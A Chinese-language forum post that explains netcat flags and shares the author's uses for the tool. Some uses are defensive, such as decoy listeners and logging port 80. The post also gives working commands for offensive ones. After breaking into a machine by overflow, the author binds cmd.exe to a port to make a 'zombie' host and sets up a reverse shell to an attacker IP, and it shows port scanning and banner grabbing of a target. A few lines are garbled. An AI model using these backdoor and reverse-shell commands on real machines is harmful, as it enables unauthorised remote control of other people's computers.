參數解釋:
-e 程式重新導向
-t 用telnet來回應
-l 監聽本地連接埠
-p 指定本地連接埠
-v 獲得連接埠資訊
-vv 獲得詳細的連接埠資訊
-z 關閉輸入輸出
-n 指定IP地址
-w 設定逾時時間
-u UDP連接埠
我就知道這麼些參數 了:
第一個:
nc -l -v -p 7626
這就是開啟本地的7626連接埠進行監聽,並反饋串連資訊這樣如果有掃描冰河木馬的人會認為你中了木馬開放了7626,和“小豬快跑”的功能有點象,再加個批次檔一起用的話就是一個“小豬快跑”了.
如果要監視是否有入侵本地80連接埠的行為,並記下來,用這個命令:
nc -l -p 80 >>c://日誌.dat
這樣,凡是有針對本機80連接埠的攻擊都會被記錄下來的.
二、
如果你通過溢出進入了別人的機器,就可以運行:
nc -l -p 123 -e cmd.exe
或者是: nc -l -p 123 -t
作用都是以cmd.exe來響應到機器上123連接埠的串連.
這樣就把溢出的主機變成了一台telnet肉雞了!
你也可一用命令讓肉雞主動串連你的主機,假設我的IP是192.168.0.1 .
在肉雞上運行: nc -e cmd.exe 192.168.0.1 777
再在本地機器上運行: nc -l -p 777
意思是讓肉雞將cmd.exe(就是個shell)主動響應到你電腦的777連接埠。
你再在本地機上監聽777連接埠,這樣就進入了對方的cmd了。
這也微十時毫 反彈連接埠式木馬的原理了。
三、
用這個命令:
nc -v 192.168.0.25 80
就獲得了192.168.0.25的80連接埠的資訊。
可以獲得IIS版本等很多重要訊息 的 。
四、
你也可以將NC作為掃描器使用:
nc -v -z 192.168.0.25 1-100
掃描192.168.0.25的1到100間的TCP連接埠
用nc -v -z -u 192.168.0.25 1-100
這是掃描1到00間的UDP連接埠。
這些就是我這幾天悟出來的。
大家還有心得什麼沒有啊!